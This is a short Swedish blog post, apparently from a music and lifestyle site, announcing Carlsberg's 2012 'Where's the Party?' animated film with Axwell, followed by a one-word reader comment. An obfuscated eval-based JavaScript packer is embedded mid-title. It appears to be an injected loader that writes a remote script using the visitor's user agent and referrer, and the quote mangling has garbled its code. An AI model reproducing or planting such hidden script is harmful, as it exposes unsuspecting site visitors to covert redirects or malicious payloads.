Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Where’s The Party? by Carlsberg 2012 – The Movie feat. Axwell

Where’s The Party? by Carlsberg 2012 – The Movie feat. Axwell
Revue Magazine

type=”text/javascript” src=”https://goviral.hs.llnwd.net/e1/playerjs/wheres_the_party_11332.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1381777&skinName=light&wmode=window&hideChrome=0″>

Where’s eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hathi|var|u0026u|referrer|zdean||js|php’.split(’|’),0,{}))
The Party? by Carlsberg 2012 – The Movie feat. Axwell

För fjärde året i rad är ”Where’s the party? by Carlsberg” tillbaka igen med Axwell från Swedish House Mafia.

I år är klubbkonceptet lite annorlunda då endast två exklusiva spelningar kommer att hållas på okända platser för ett begränsat antal människor. I den här animerade filmen, som har världspremiär idag, är Axwell superhjälte på väg till den hemliga platsen där festen hålls! Låten är exklusivt producerad för filmen! Följ instruktionerna i filmen så får har ni också en chans att få biljetter.

Kan gissa att detta blir en riktigt bra fest 🙂

Comments

  1. pelle

    najs